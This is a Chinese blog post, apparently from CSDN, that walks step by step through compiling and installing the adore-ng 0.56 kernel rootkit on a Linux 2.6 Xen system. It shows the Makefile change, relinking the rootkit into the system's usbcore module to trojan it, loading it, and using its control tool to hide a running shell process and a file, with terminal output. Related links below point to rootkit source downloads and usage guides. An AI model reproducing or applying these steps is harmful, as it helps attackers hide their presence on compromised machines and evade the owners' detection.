rootkit(1)-adore-ng0.56在Linux2.6应用

最新推荐文章于 2020-02-13 15:55:00 发布
最新推荐文章于 2020-02-13 15:55:00 发布
阅读量2k 收藏
点赞数
分类专栏: 技术小屋 文章标签: linux makefile filter codec cmd header
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sploving/article/details/4583312
版权

自己机器是fc8
#uname -r
2.6.18.8-xen

源码在/home/sploving/xen

1. 下载adore-ng-0.56
2. cp Makefile.2.6 Makefile
并修改相应的项,以适应自己的内核版本。
3. make
4. ./relink
[root@localhost adore-ng-0.56-wztfix]# ./relink26

This script may be used to relink adore into
already existing LKMs on the system. This is the Kernel 2.6
version of 'relink'. Note that -DRELINKED has to be switched on
in the Makefile. Modules compiled with this switch cant work stand alone.

The following LKMs are available:


fuse ipt_MASQUERADE iptable_nat ip_nat bridge
bnep rfcomm l2cap bluetooth autofs4
sunrpc ipt_REJECT iptable_filter ip_tables xt_state
ip_conntrack nfnetlink xt_tcpudp ip6t_ipv6header ip6t_REJECT
ip6table_filter ip6_tables x_tables ipv6 ib_iser
rdma_cm ib_addr ib_cm ib_sa ib_mad
ib_core iscsi_tcp libiscsi scsi_transport_iscsi binfmt_misc
dm_mirror dm_multipath dm_mod snd_hda_intel snd_hda_codec
snd_seq_dummy snd_seq_oss snd_seq_midi_event snd_seq snd_seq_device
snd_pcm_oss snd_mixer_oss tsdev snd_pcm evdev
i2c_i801 usbhid snd_timer pcspkr serio_raw
i2c_core 8250_pci 8250_pnp shpchp snd
8250 parport_pc soundcore pci_hotplug serial_core
parport snd_page_alloc sg sr_mod cdrom
rtc ahci libata sd_mod scsi_mod
ext3 jbd uhci_hcd ohci_hcd ehci_hcd
usbcore

Chose one:
选择一个usbcore
Choice was >>>usbcore<<<
Searching for usbcore.ko ...
Found /lib/modules/2.6.18.8-xen/kernel/drivers/usb/core/usbcore.ko!

Copy trojaned LKM back to original LKM? (y/n)
y

5.insmod  adore-ng-2.6.ko
出现如下错误:
insmod: error inserting 'adore-ng-2.6.o': -1 Invalid module format
问题是内核版本不同。应该是makefiles设置的内核版本不对.
修改makefile 将
KERNEL_SOURCE=/usr/src/kernel/2.6.23.1-42.fc8-i686改为:
KERNEL_SOURCE=/home/sploving/xen/build-linux-2.6.18-xen_x86_32

6. ./ava I
Checking for adore  0.12 or higher ...
Adore 1.56 installed. Good luck.

成功安装!下面开始应用此rootkit来隐藏相应的文件。

7.隐藏进程:
[root@localhost adore-ng-0.56-wztfix]# ps
  PID TTY          TIME CMD
 3957 pts/0    00:00:00 su
 3960 pts/0    00:00:00 bash
 5028 pts/0    00:00:00 ps

[root@localhost adore-ng-0.56-wztfix]# ./ava i 3960
Checking for adore  0.12 or higher ...
Adore 1.56 installed. Good luck.
Made PID 3960 invisible.

[root@localhost adore-ng-0.56-wztfix]# ps
  PID TTY          TIME CMD
 3957 pts/0    00:00:00 su
8.隐藏文件:
[root@localhost adore-ng-0.56-wztfix]# ls
errors temp
[root@localhost adore-ng-0.56-wztfix]# ./ava h errors
Checking for adore  0.12 or higher ...
Adore 1.56 installed. Good luck.
File 'errors' is now hidden.
[root@localhost adore-ng-0.56-wztfix]# ls
temp

sploving
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
adore-ng linux rootkit
05-12
老牌linux rootkit工具 该版本能稳定运行在内核2.4-2.6中
Linux Rootkit Sample && Rootkit Defenser Analysis
weixin_30855761的博客
08-02 1364
目录 1. 引言 2. LRK5 Rootkit 3. knark Rootkit 3. Suckit(super user control kit) 4. adore-ng 5. WNPS 6. Sample Rootkit for Linux 7. suterusu 8. Rootkit Defense Tools 9. Linux Rootkit Scanner: k...
Adore-ng-0.56源码分析
cnbird's blog
09-11 1031
Adore-ng-0.56具备以下几个功能 1.        文件隐藏 2.        进程隐藏 3.        端口隐藏 4.        清理犯罪现场 5.        获得root权限 使用:   环境: CentOS 5.3  kernel 2.6.18   代码结构:     [root@localhost adore-ng]# ls adore-n
adore-ng-master.zip
02-13
Adore-ng 木马病毒所需软件包其中之一:adore-ng-master.zip,大胆放心使用,不需要积分,只求浏览博客时留下您的评论和点赞,谢谢!
Adore-ng的使用
coutuo2575的博客
08-11 350
1、下载资源adore-ng-0.56.zip另外一个工具包,更简单ddrk.tgz 直接运行setup PASS PORT就可以了2、安装内核开发包yum -y install kernel-devel3、对内核软连接ln -...
Rootkitadore-ng 模拟木马病毒
02-13 1595
Rootkit是一种特殊的恶意软件,它的功能是在安装目标上隐藏自身及指定的文件、进程和网络链接等信息,比较多见到的是Rootkit一般都和木马、后门等其他恶意程序结合使用。 在我们生活中,经常看的电视剧谍战片里有一个必不可少的人物——卧底。它的职责就是:良好的伪装使得对手对此长时间毫无察觉;他赢得敌人的信任并因此身居要职,这使得他能够源源不断地获取重要情报并利用其独特渠道传送回去。 而我们今天要模...
linux 内核rootkit adore-ng-0.56
02-17
linux 内核rootkit adore-ng-0.56 完全解析 想对linux下的rootkit有个全面的了解 这是一个很好的例子。
awesome-linux-rootkits:令人敬畏的linux-rootkits
01-31
awesome-linux-rootkits:令人敬畏的linux-rootkits
Linux rootkit detector-开源
07-17
checkps 是一个通过检测伪造输出和类似异常来检测 rootkit 的程序。 ps 检查应该适用于 /proc,(当前不完整的)netstat 检查更针对 linux
adore-ng-0.56
11-18
经典rootkit源码
图说adore-ng之文件隐藏
么刚的专栏
10-12 2110
文件隐藏说到底就是让ls、find一类的操作所返回的结果中没有需要隐藏的文件、目录。而ls、find本质上是对目录的读操作。我们要劫持它的读操作函数,让它读不出来。那读操作那个函数在哪呢?见下图。 上图是以普通文件为例说明的,目录也是类似的。只不过名字不同叫ext2_dir_operations和ext2_dir_inode_operations。说来说去怎么修改呢?见下图。
Adore-ng使用简介
05-29 1206
Team: D.S.T 数据安全中心这是个adore-ng的简单安装使用指南,如果是老鸟就不用看了,呵呵adore-ng是一款优秀的LKM rootkit,可以从http://stealth.openwall.net/rootkits/ 这里下载到它的最新版本。目前最新版的是0.54,能够在2.4 -2.6内核下使用,并且稳定性十分好。下面我们通过一步步的演示来揭示它强大的功能.1.以ro
adore-ng笔记和Linux普通用户提权
only-ring的文档库
03-18 1349
安装: [root@xuegod63 ~]# unzipadore-ng-master.zip [root@xuegod63 ~]# cdadore-ng-master [root@xuegod63 adore-ng-master]#rpm  -ivh/mnt/Packages/kernel-devel-2.6.32-220.el6.x86_64.rpm yum install gc
xen 添加hypercall
sploving的专栏
10-10 5557
 在linux系统中添加新的系统调用,一般需要三个步骤:1.  注册新的系统调用号2. 更新系统调用表3.  添加新函数在xen中添加一个 hypercall,类似于在linux中添加一个系统调. 基本上也是上面几个步骤。现在举个具体的例子:比如我们要在xen中添加一个打印消息的hypercall,参数有一个,类型为char*, 代表我们要打印的消息. 函数原型为:
enable Selinux
sploving的专栏
03-06 2727
<br />系统开启selinux步骤如下:<br />配置内核config文件,开启SELINUX 获得SElinux策略包以及工具 <br /> apt-get install selinux-basics selinux-policy-default1 . <br />运行selinux-activate 来配置Grub重启. <br />运行check-selinux-installation 检查selinux是不是装成功。 如果出现FSCKFIX的错误,设置/etc/defaul
ubuntu10.04,编译xen 4.01
sploving的专栏
09-03 2602
<br />1.下载xen4.01的源码<br />2.安装必须的软件包(请参考http://wiki.xensource.com/xenwiki/Xen4.0)apt-get install bcc bin86 gawk bridge-utils iproute libcurl3 libcurl4-openssl-dev bzip2 <br /> module-init-tools transfig tgif texinfo texlive-latex-base texlive-latex-recomm
linux rootkit
最新发布
03-16
Linux rootkit是一种恶意软件,它可以隐藏在操作系统内核中,以避免被检测和删除。它可以允许攻击者远程控制受感染的计算机,窃取敏感信息,修改文件和系统设置,甚至可以使系统崩溃。为了保护计算机安全,用户应该定期更新操作系统和安全软件,避免下载和安装来自不可信来源的软件,以及使用强密码和多因素身份验证。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值